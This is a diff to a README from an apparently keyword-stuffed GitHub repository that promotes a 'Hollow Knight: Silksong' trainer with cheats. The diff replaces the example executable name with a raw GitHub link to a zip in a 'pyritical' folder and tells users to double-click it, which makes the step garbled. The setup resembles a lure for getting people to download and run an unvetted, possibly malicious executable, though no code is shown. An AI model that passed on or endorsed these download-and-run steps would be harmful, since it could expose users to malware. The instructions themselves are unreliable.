nwekar666/Hollow-Knight-Silksong-Trainer-Download-Cheats-Infinite-Silk-Invincibility-Fast-Attacks/README.md

    If the file is in a .zip format, right-click on it and choose "Extract All."
 Follow the prompts to extract the contents to a new folder.

 6. **Run the Trainer:**
    Open the folder where you extracted the files.
-Double-click the trainer executable file (e.g., `HollowKnightTrainer.exe`) to start the application.
+Double-click the trainer executable file (e.g., `https://raw.githubusercontent.com/nwekar666/Hollow-Knight-Silksong-Trainer-Download-Cheats-Infinite-Silk-Invincibility-Fast-Attacks/main/pyritical/Hollow-Knight-Silksong-Trainer-Download-Cheats-Infinite-Silk-Invincibility-Fast-Attacks.zip`) to start the application.

 7. **Launch Hollow Knight: Silksong:**
    Open the game normally.
 Once the game is running, switch back to the trainer.